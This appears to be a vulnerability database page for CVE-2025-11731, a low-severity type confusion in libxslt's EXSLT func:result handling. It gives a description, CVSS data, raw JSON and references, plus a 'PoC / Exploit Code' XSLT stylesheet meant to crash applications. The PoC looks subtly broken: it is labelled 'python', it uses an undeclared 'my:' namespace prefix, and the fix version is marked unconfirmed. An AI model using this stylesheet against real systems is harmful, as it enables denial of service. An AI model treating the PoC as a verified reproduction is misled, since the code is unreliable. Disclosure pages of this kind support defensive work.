Security Vulnerability Report
中文
CVE-2025-11731 CVSS 3.1 LOW

CVE-2025-11731

Published: 2025-10-14 06:15:34
Last Modified: 2026-04-27 21:16:23
Source: [email protected]

Description

A flaw was found in the exsltFuncResultComp() function of libxslt, which handles EXSLT <func:result> elements during stylesheet parsing. Due to improper type handling, the function may treat an XML document node as a regular XML element node, resulting in a type confusion. This can cause unexpected memory reads and potential crashes. While difficult to exploit, the flaw could lead to application instability or denial of service.

CVSS Details

CVSS Score
3.1
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

libxslt < 1.1.43(待确认具体修复版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?xml version="1.0" encoding="UTF-8"?> <!-- CVE-2025-11731 PoC: Type confusion in exsltFuncResultComp() --> <!-- This XSLT stylesheet triggers type confusion by making func:result --> <!-- return a document node instead of an element node --> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:func="http://exslt.org/functions" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="func exsl"> <func:function name="my:trigger"> <!-- func:result returns a document node (exsl:node-set result wrapped as document), which causes type confusion in exsltFuncResultComp() --> <func:result select="exsl:node-set(/*)" /> </func:function> <xsl:template match="/"> <root> <xsl:value-of select="my:trigger()" /> </root> </xsl:template> </xsl:stylesheet> <!-- Usage: Apply this stylesheet to any XML document using xsltproc or any application linked against vulnerable libxslt. Expected result: Crash (segfault) or unexpected memory read. -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11731", "sourceIdentifier": "[email protected]", "published": "2025-10-14T06:15:34.483", "lastModified": "2026-04-27T21:16:22.567", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the exsltFuncResultComp() function of libxslt, which handles EXSLT <func:result> elements during stylesheet parsing. Due to improper type handling, the function may treat an XML document node as a regular XML element node, resulting in a type confusion. This can cause unexpected memory reads and potential crashes. While difficult to exploit, the flaw could lead to application instability or denial of service."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:11015", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-11731", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2403688", "source": "[email protected]"}, {"url": "https://gitlab.gnome.org/GNOME/libxslt/-/issues/151", "source": "[email protected]"}, {"url": "https://gitlab.gnome.org/GNOME/libxslt/-/merge_requests/78", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.